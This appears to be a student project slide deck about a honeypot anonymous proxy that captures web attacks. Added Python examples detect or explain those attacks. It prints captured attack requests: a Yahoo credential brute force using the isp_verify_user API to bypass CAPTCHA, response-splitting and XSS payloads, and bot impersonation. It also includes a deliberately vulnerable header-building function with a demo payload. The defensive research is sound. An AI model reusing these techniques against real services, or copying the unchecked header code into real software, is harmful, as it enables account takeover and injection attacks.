Web Security Project
Creating an anonymous proxy server to monitor and analyze new web based attacks
Mentors: Amichai Shulman, Eldad Chai
Students: Nadav Amit, Dani Daniel
Feb 25, 2016
Project Goals & Objectives

Main Goals
1. Log real malicious web based attacks.
2. Identify new malicious web attacks.
3. Determine which attacks are in common use, in order to focus defenses on them.

Main Objectives
1. Create a working, stable anonymous proxy server that can log real web based attacks. Web attackers usually route through anonymous proxies to avoid detection, so an open anonymous proxy attracts exactly that traffic.
2. Create a tool that analyzes the logs in order to detect patterns of web based attacks and produce statistics of commonly used attacks.
Project Architecture
[Diagram components: Hacker, Computer A, Computer B, Proxy Server on VMware (honeypot machine, highly anonymous proxy), Web Server, Data Search & Index Tool]
Architecture Components

1. Proxy Server
- Unix based machine, installed on a VMware virtual machine (easy to reconstruct if it gets attacked).
- Based on a Privoxy server; writes all connection logs to local files.
- The server also runs an FTP server to allow easy extraction of the data.
- A GeoIP API is used to resolve the source IP of each attacker to a country.
- Low ASCII (control) characters are encoded before they are written to the log, so that they survive for attack analysis (EOF and similar characters).
- A cron job archives the logs.

2. Backup Agent
- Cobian Backup
- Unzip script

3. Splunk
- Data indexing and search tool.
- Enables logging of known attacks.
- Enables querying and analysis of accesses.
- Fields and tags were created in order to allow easy data extraction.
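An added example of the two logging steps listed above, written for this page and not taken from the project: escaping low ASCII characters before a captured request is written to the log, and splitting the resulting record into the fields a Splunk-style index would carry. The record layout ("timestamp thread Analysis: ip: ... Country: ... request") and the field names are assumptions modelled on the header samples shown later in the deck, not Privoxy's real log format; the sample request is constructed.

```python
import re

# --- proxy side: one captured request becomes one printable log line --------
def escape_low_ascii(raw: bytes) -> str:
    """Escape control characters so a request cannot corrupt the log.

    Bytes 0x00-0x1F and 0x7F become \\xNN; bytes >= 0x80 are escaped the
    same way to keep the file pure ASCII.  A request carrying raw CR/LF
    (response splitting, log injection) or NUL (string truncation) therefore
    stays on one line, and the analyst sees exactly what was sent.
    """
    return "".join(chr(b) if 0x20 <= b < 0x7F else f"\\x{b:02x}" for b in raw)


def log_record(ts: str, thread: str, ip: str, country: str, raw_request: bytes) -> str:
    """Assumed record layout, modelled on the deck's "Analysis:" samples."""
    return f"{ts} {thread} Analysis: ip: {ip} Country: {country} {escape_low_ascii(raw_request)}"


# --- indexer side: extract the fields a Splunk-style search would use --------
CRLF = "\\x0d\\x0a"          # a CR LF pair as written by escape_low_ascii
RECORD_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d\d \d\d:\d\d:\d\d\.\d{3}) (?P<thread>[0-9a-f]+) "
    r"Analysis: ip: (?P<ip>[0-9.]+) Country: (?P<country>.+?) "
    r"(?P<method>[A-Z]+) (?P<target>\S+) (?P<version>HTTP/\d\.\d)(?P<rest>.*)$"
)


def parse_record(line: str) -> dict:
    """Split one log line into timestamp, source, request line and headers."""
    m = RECORD_RE.match(line)
    if not m:
        raise ValueError("not a proxy analysis record: " + line[:60])
    rec = m.groupdict()
    headers = {}
    for h in rec.pop("rest").split(CRLF):
        name, sep, value = h.partition(":")
        if sep:                                   # skip the empty pieces
            headers[name.strip().lower()] = value.strip()
    rec["headers"] = headers
    rec["path"] = rec["target"].split("?", 1)[0]
    # Convenience fields, the equivalent of extracted fields defined in Splunk.
    rec["host"] = headers.get("host", "")
    rec["user_agent"] = headers.get("user-agent", "")
    rec["x_forwarded_for"] = headers.get("x-forwarded-for", "")
    return rec


if __name__ == "__main__":
    # Constructed sample request (not from the deck) with an embedded NUL byte.
    raw = (b"GET /config/isp_verify_user?l=hu.&p=lillian HTTP/1.0\r\n"
           b"Host: 203.212.170.100\r\n"
           b"X-Forwarded-For: 77.125.93.72:8118,yahoo.com\r\n"
           b"X-Junk: a\x00b\r\n\r\n")
    line = log_record("Jun 06 12:22:06.101", "b2caeb90", "24.86.107.62", "Canada", raw)
    print(line)
    print(parse_record(line))
```

Escaping on the way in is what makes the "one record per line" assumption of the indexer safe: without it a single request containing a bare newline would be indexed as two events, and the second half would look like a request that was never sent.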
Samples of Identified Malicious Web Attacks

Yahoo Brute Force Attack

Attack purpose: retrieve Yahoo login credentials.

Attack scenario: Yahoo operates many servers around the world (for load sharing, backup, etc.), and the communication between these servers is done through a web API. Attackers use this interface to impersonate servers and retrieve user credentials.

How is it done? If you simply try to log in to Yahoo too many times you are asked to solve a CAPTCHA. But if you call the API /config/isp_verify_user?l=<login>&p=<password> directly against a Yahoo server, you can verify that a given username exists and then brute force which password grants access to the account.

For example: http://124.108.120.50/config/isp_verify_user?l=israel&p=israeli

Attack method: use anonymous proxies to attempt logins with many usernames and passwords against the Yahoo servers. Since the many Yahoo servers around the world are not synchronized, the attempts can be spread across all of them; adding proxy servers into the equation multiplies the number of attempts available even further.
Many tools exist to do this, with and without proxies.
[Chart: number of attempts through our proxy in a 10 day period, per targeted Yahoo host. This is only from our proxy! Blue: successful attempts. Red: HTTP response 999, meaning the Yahoo server detected the attack.]
Targeted hosts: edit.yahoo.com, login.yahoo.com, edit.europe.yahoo.com, edit.in.yahoo.com, e4.edit.cnb.yahoo.com, e3.yahoo.co.kr, edit.vip.tpe.yahoo.com, l30.login.scd.yahoo.com, e3.member.ukl.yahoo.com, e1.member.ukl.yahoo.com, e2.member.ukl.yahoo.com, e4.member.ukl.yahoo.com, e5.member.ukl.yahoo.com, e6.member.ukl.yahoo.com, sbc1.login.dcn.yahoo.com, e3.edit.cnb.yahoo.com, l2.login.dcn.yahoo.com, l3.login.dcn.yahoo.com, l4.login.dcn.yahoo.com, l5.login.dcn.yahoo.com, l6.login.dcn.yahoo.com, l7.login.dcn.yahoo.com, l8.login.dcn.yahoo.com, l9.login.dcn.yahoo.com, l10.login.dcn.yahoo.com, l11.login.dcn.yahoo.com, l12.login.dcn.yahoo.com, l13.login.dcn.yahoo.com, l14.login.dcn.yahoo.com, l15.login.dcn.yahoo.com, l16.login.dcn.yahoo.com, l18.login.dcn.yahoo.com, l19.login.dcn.yahoo.com, l20.login.dcn.yahoo.com, l22.login.dcn.yahoo.com, l23.login.dcn.yahoo.com, l29.login.dcn.yahoo.com, l30.login.dcn.yahoo.com, sbc1.login.vip.dcn.yahoo.com, e1.edit.vip.sc5.yahoo.com, l1.login.scd.yahoo.com, l2.login.scd.yahoo.com, l3.login.scd.yahoo.com, l4.login.scd.yahoo.com, l5.login.scd.yahoo.com, l6.login.scd.yahoo.com, l7.login.scd.yahoo.com, l8.login.scd.yahoo.com, l9.login.scd.yahoo.com, l10.login.scd.yahoo.com, l11.login.scd.yahoo.com, l12.login.scd.yahoo.com, l13.login.scd.yahoo.com, l15.login.scd.yahoo.com
Typical Attack headers

Jun 06 12:22:06.101 b2caeb90 Analysis: ip: 24.86.107.62 Country: Canada
GET /config/isp_verify_user?l=hu.&p=lillian HTTP/1.0
Host: 203.212.170.100
Referer: http://203.212.170.100
Accept-Language: en
X-Forwarded-For: 77.125.93.72:8118,yahoo.com
Cookie: Y=v=1-;
Connection: close

Jun 06 12:22:06.292 b34afb90 Analysis: ip: 201.68.195.20 Country: Brazil
GET /config/isp_verify_user?l=angel_annabel&p=2020 HTTP/1.0
Host: 124.108.120.50
YahooRemoteIP: 217.12.5.161
Referer: http://124.108.120.50
Accept-Language: en
Connection: Close
X-Forwarded-For: 69.147.112.216,google.com
Accept: */*

Jun 06 12:22:10.483 a7497b90 Analysis: ip: 75.184.119.157 Country: United States
GET /config/login?.patner=sbc&login=david+2&passwd=flag&.save=1 HTTP/1.0
Connection: close
Accept: */*
Accept: -Language: en
Host: l05.member.re3.yahoo.com

Note the X-Forwarded-For values (77.125.93.72:8118,yahoo.com and 69.147.112.216,google.com): no real proxy chain writes a port suffix or a bare hostname there, so the tools apparently forge this header to make the request look as if it came via Yahoo or Google infrastructure.
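An added example, written for this page and not part of the project's analysis tool, of the brute-force pattern the headers above show, run over constructed access lines: it groups isp_verify_user calls by source IP and guessed login, counts distinct passwords per login, records the set of Yahoo hosts each source spread its guesses over, and counts the 999 replies. The three-column "ip url status" line format and the status column are assumptions; the proxy log in the deck does not show response codes, only the chart does.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

VERIFY_PATH = "/config/isp_verify_user"

# Constructed access lines (not from the deck): source ip, request URL, status.
SAMPLE_LINES = """\
24.86.107.62 http://203.212.170.100/config/isp_verify_user?l=hu.&p=lillian 999
24.86.107.62 http://203.212.170.100/config/isp_verify_user?l=hu.&p=lillian1 999
201.68.195.20 http://124.108.120.50/config/isp_verify_user?l=angel_annabel&p=2020 200
201.68.195.20 http://edit.europe.yahoo.com/config/isp_verify_user?l=angel_annabel&p=2021 200
201.68.195.20 http://l2.login.dcn.yahoo.com/config/isp_verify_user?l=angel_annabel&p=2022 200
201.68.195.20 http://l3.login.scd.yahoo.com/config/isp_verify_user?l=angel_annabel&p=2023 200
10.0.0.5 http://www.example.com/index.html 200
""".splitlines()

LINE_RE = re.compile(r"^(?P<ip>\S+) (?P<url>\S+) (?P<status>\d{3})$")


def find_brute_force(lines, max_passwords_per_login=3):
    """Group isp_verify_user calls by source ip and guessed login.

    A source that tries more than max_passwords_per_login distinct passwords
    for one login, or that receives Yahoo's 999 response (the server has
    detected the attack), is reported together with the Yahoo hosts it
    spread its guesses over.  Spreading across hosts is exactly how the
    attackers dodge per-server rate limits, so the host count is itself a signal.
    """
    passwords = defaultdict(lambda: defaultdict(set))   # ip -> login -> {pw}
    hosts = defaultdict(set)                              # ip -> {target host}
    denied = defaultdict(int)                             # ip -> count of 999
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["url"])
        if url.path != VERIFY_PATH:
            continue
        q = parse_qs(url.query, keep_blank_values=True)
        login = q.get("l", [""])[0]
        passwords[m["ip"]][login].add(q.get("p", [""])[0])
        hosts[m["ip"]].add(url.hostname)
        if m["status"] == "999":
            denied[m["ip"]] += 1
    report = {}
    for ip, per_login in passwords.items():
        flagged = {login: len(pws) for login, pws in per_login.items()
                   if len(pws) > max_passwords_per_login}
        if flagged or denied[ip]:
            report[ip] = {"brute_forced_logins": flagged,
                          "denied_999": denied[ip],
                          "hosts_used": sorted(hosts[ip])}
    return report


if __name__ == "__main__":
    for ip, info in find_brute_force(SAMPLE_LINES).items():
        print(ip, info)
```

In a live deployment the grouping would be keyed on a time window as well (the deck's chart covers 10 days), and the threshold tuned so that a user mistyping a password twice is not reported.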
Response Splitting Attack

Attack Description
The essence of HTTP Response Splitting is the attacker's ability to send a single HTTP request that forces the web server to form an output stream which the target then interprets as two HTTP responses instead of one. The injected CR LF pairs (%0D%0A in the request) end the server's own headers early, and everything after them, headers and body alike, is under the attacker's control.
Typical Attack headers
May 30 00:03:58.496 73c84b90 Analysis: ip: 89.149.242.190 Country: Germany
GET /lnv/viewHTTP/1.1%20200%20OK%0D%0ADate:%20Sat,%2030%20May%202009%2003:54:07%20GMT%0D%0AServer:%20Apache/1.3.28%20(Unix)%20PHP/4.3.4%0D%0AX-Powered-By:%20PHP/4.3.4%0D%0ASet-Cookie:%20PHPSESSID=6019eb9689437d8b69f93967be7544a9;%20path=/;%20domain=.sundojungmil.co.kr%0D%0AExpires:%20Thu,%2019%20Nov%201981%2008:52:00%20GMT%0D%0ACache-Control:%20no-store,%20no-cache,%20must-revalidate,%20post-check=0,%20pre-check=0%0D%0APragma:%20no-cache%0D%0AConnection:%20close%0D%0ATransfer-Encoding:%20chunked%0D%0AContent-Type:%20text/html%0D%0A%0D%0Ae3d%0D%0A%0D%0A%3Cscript%20language= HTTP/1.1
Connection: close
Host: forums.lenovo.com

Decoded, every %0D%0A is a CR LF pair: the request path carries a complete fake "200 OK" response (Date, Server, Set-Cookie, Cache-Control, a chunked Transfer-Encoding, a text/html Content-Type, the chunk size e3d) followed by the start of a <script> tag, which is where the path is cut off in the capture.
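An added example, written for this page and not part of the deck or of the attacked site, of the server-side bug behind a response splitting capture like the one above and of the fix. The vulnerable function copies a user-supplied redirect target into a Location header unchecked; the hardened one refuses any value containing CR or LF, which RFC 7230 does not permit in a header value anyway. The payload is a constructed textbook two-response form rather than the exact capture, so the second response is complete and a client can be shown reading it.

```python
# Constructed attacker value for a "redirect-to" parameter (not the deck's payload).
SPLIT_PAYLOAD = (
    "/index.html\r\nContent-Length: 0\r\n\r\n"
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nContent-Length: 25\r\n\r\n"
    "<script>alert(1)</script>"
)


def build_redirect_vulnerable(target: str) -> bytes:
    """The bug: the user-supplied value goes into a header unchecked."""
    return (f"HTTP/1.1 302 Found\r\nLocation: {target}\r\n"
            f"Content-Length: 0\r\n\r\n").encode("latin-1")


def is_safe_header_value(value: str) -> bool:
    """A header value may contain neither CR nor LF."""
    return "\r" not in value and "\n" not in value


def build_redirect_hardened(target: str) -> bytes:
    """Same response, but CR/LF in the value is refused instead of echoed."""
    if not is_safe_header_value(target):
        raise ValueError("CR/LF in header value")
    return build_redirect_vulnerable(target)


def count_response_heads(stream: bytes) -> int:
    """How many status lines a client reading the byte stream would see."""
    return sum(1 for line in stream.split(b"\r\n") if line.startswith(b"HTTP/1."))


def injected_response(stream: bytes):
    """What a client honouring Content-Length reads after the first response.

    Returns (status_line, body) of the second response, or None when the
    stream holds only one.
    """
    head_end = stream.find(b"\r\n\r\n")
    if head_end < 0:
        return None
    second = stream[head_end + 4:]
    if not second.startswith(b"HTTP/1."):
        return None
    head, _, body = second.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    length = len(body)
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            length = int(value.strip())
    return lines[0].decode("latin-1"), body[:length].decode("latin-1")


if __name__ == "__main__":
    stream = build_redirect_vulnerable(SPLIT_PAYLOAD)
    print(stream.decode("latin-1"))
    print(count_response_heads(stream), "responses;", injected_response(stream))
```

The attacker's "Content-Length: 0" closes the real 302 response, so the client treats the bytes that follow as a fresh response whose headers and body the attacker wrote; with a caching proxy in between, that fake page is what gets cached for the URL.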
Cross-Site Scripting Attack

Attack Description
Cross-Site Scripting (XSS) takes advantage of a security vulnerability, typically found in web applications, which allows code injection by malicious web users into the web pages viewed by other users.
Typical Attack headers
May 29 22:20:32.730 7f452b90 Analysis: ip: 60.16.140.154 Country: China
GET / HTTP/1.0
Referer: js/bdsug.js?v=1.1.0.3>')};window.onunload=function(){};window.onload=function(){document.forms[0http://www.baidu.com/s?ie=gb2312&bs=%B1%F9%E4%BF%C1%E8&sr=&z=&cl=3&f=8&wd=%B1%F9%E4%BF%C1%E8%B0%CD%C8%F0%BF%CB%B1%F9%E4%BF&ct=0
Accept: */*
Accept-Language: zh-cn,en-us
Cookie: BAIDUID=33549062C228F38D3ACF4C8FDF85D5C2:FG=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Hotbar 4.1.8.0; RogueCleaner; Alexa Toolbar)
Host: www.baidu.com
Pragma: no-cache
Connection: close
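An added example, mine and not the project's analysis tool, of how a log analyzer can flag captures like the one above: it percent-decodes the request target and the Referer, Cookie and User-Agent headers (repeatedly, since attackers double-encode to get past filters) and matches a small set of XSS indicators. The indicator list and the field names are my choice; the test input reuses the Referer value from the capture above and otherwise constructed requests.

```python
import re
from urllib.parse import unquote

# Indicator patterns applied to percent-decoded request data.
XSS_INDICATORS = {
    "script_tag":     re.compile(r"<\s*script", re.I),
    # "on" + at least three letters + "=" (onload=, onerror=, onclick=, ...);
    # the length bound keeps an ordinary parameter like "one=" from matching.
    "event_handler":  re.compile(r"\bon[a-z]{3,}\s*=", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
    "dom_access":     re.compile(
        r"\b(document|window)\s*\.\s*(cookie|forms|location|write|onload|onunload)", re.I),
}


def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding, stopping when a round changes nothing."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def xss_indicators(target: str, headers: dict) -> list:
    """Names of the indicators found in the request target or in the
    Referer, Cookie and User-Agent headers (header names lower-cased)."""
    fields = [target] + [headers.get(h, "") for h in ("referer", "cookie", "user-agent")]
    text = "\n".join(decode_fully(f) for f in fields)
    return sorted(name for name, rx in XSS_INDICATORS.items() if rx.search(text))


# Referer value as captured in the deck (everything else below is constructed).
CAPTURED_REFERER = ("js/bdsug.js?v=1.1.0.3>')};window.onunload=function(){};"
                    "window.onload=function(){document.forms[0http://www.baidu.com/s?"
                    "ie=gb2312&bs=%B1%F9%E4%BF%C1%E8&sr=&z=&cl=3&f=8&wd=%B1%F9%E4%BF&ct=0")

if __name__ == "__main__":
    print(xss_indicators("/", {"referer": CAPTURED_REFERER}))
    print(xss_indicators("/search?q=%253Cscript%253Ealert(1)%253C/script%253E", {}))
```

The decoded text is matched as a whole rather than field by field so that a payload split across the query string and the Referer still trips an indicator; the cost is that the report does not say which field carried it, which the analyst can see in the record anyway.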
Bots Impersonation Attack

Attack Description
Attackers impersonate Google/MSN bots (by sending the crawler's User-Agent string) to access forums and other internet sites and insert malicious data; many sites grant known crawlers access that ordinary visitors do not get, and a User-Agent string alone is enough to claim that status.

Typical Attack headers
Jun 06 00:28:48.276 8acf1b90 Analysis: ip: 123.149.121.132 Country: China
GET /forum-20-1.html HTTP/1.0
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Host: xgymcn.5d6d.com
Pragma: no-cache
Connection: close
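An added example, written for this page and not part of the project, of the check a site (or this log analyzer) can apply to a request like the one above: the reverse DNS name of the source address must lie under the crawler operator's domain (googlebot.com/google.com for Googlebot, search.msn.com for Bing/MSN), and the forward lookup of that name must return the same address. The resolver is injectable so the example runs offline against constructed DNS tables; the addresses and PTR records in those tables are made up for the demonstration, and the live lookups are only used when no tables are passed.

```python
import socket

# Domains whose reverse-DNS names legitimately belong to each crawler.
CRAWLER_DOMAINS = {
    "googlebot": ("googlebot.com", "google.com"),
    "bingbot": ("search.msn.com",),
}


def claimed_crawler(user_agent: str):
    """Which crawler, if any, the User-Agent string claims to be."""
    ua = user_agent.lower()
    if "googlebot" in ua:
        return "googlebot"
    if "bingbot" in ua or "msnbot" in ua:
        return "bingbot"
    return None


def live_reverse(ip: str):
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:
        return None


def live_forward(name: str):
    try:
        return socket.gethostbyname(name)
    except OSError:
        return None


def verify_crawler(ip: str, user_agent: str, reverse=live_reverse, forward=live_forward) -> str:
    """Two-step check for a request claiming to be a search-engine bot.

    1. Reverse DNS of the source ip must yield a name under the crawler's
       domain.  An impersonator controls the PTR record of its own address
       and can put any name there, so this step alone proves nothing.
    2. Forward DNS of that name must return the same ip.  Only the operator
       of googlebot.com / search.msn.com can make that hold.
    """
    bot = claimed_crawler(user_agent)
    if bot is None:
        return "no-crawler-claim"
    name = reverse(ip)
    suffixes = tuple("." + d for d in CRAWLER_DOMAINS[bot])
    if not name or not name.lower().endswith(suffixes):
        return "impersonation"
    if forward(name) != ip:
        return "impersonation"
    return "verified"


# Constructed DNS tables standing in for the live resolver (not real records).
FAKE_PTR = {
    "66.249.66.1": "crawl-66-249-66-1.googlebot.com",   # consistent pair
    "203.0.113.7": "crawl-66-249-66-1.googlebot.com",   # forged PTR on the attacker's own ip
    # 123.149.121.132, the captured source, has no PTR record at all
}
FAKE_A = {"crawl-66-249-66-1.googlebot.com": "66.249.66.1"}

GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"


def check_captured(ip: str, user_agent: str) -> str:
    """verify_crawler against the constructed tables, so it runs offline."""
    return verify_crawler(ip, user_agent, reverse=FAKE_PTR.get, forward=FAKE_A.get)


if __name__ == "__main__":
    for ip in ("66.249.66.1", "203.0.113.7", "123.149.121.132"):
        print(ip, check_captured(ip, GOOGLEBOT_UA))
```

The forged-PTR case is the one worth keeping in mind: a reverse lookup that "looks like Google" is cheap to fake, and it is the forward confirmation that does the work.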
SMTP over HTTP Attack

Typical Attack headers
Jun 01 17:22:28.436 add54b90 Analysis: ip: 217.86.183.71 Country: Germany
CONNECT 205.188.251.21:443 HTTP/1.0
Host: 205.188.251.21:443
Connection: close
Attack Description
CONNECT asks the proxy to open a raw TCP tunnel to the given host and port; the proxy then relays bytes in both directions without seeing which protocol runs inside, so mass-mailing tools use such tunnels to relay SMTP traffic through anonymous proxies. One client can send roughly 500,000 e-mails per hour! [http://en.wikipedia.org/wiki/Dark_Mailer]

Other Attacks
- Automatic posting in forums
- Click fraud (simulated clicks to earn money, vote in polls, etc.)

Attack Types
[Chart: observed attacks by type]

Attacks by Server Type
[Charts: server distribution on the Internet (http://news.netcraft.com/archives/web_server_survey.html) versus the servers attacked through the proxy]

Originating Countries
[Chart: attack origins by country; the distribution depends on the website where the proxy was posted and on the proxy's location]

Thank You.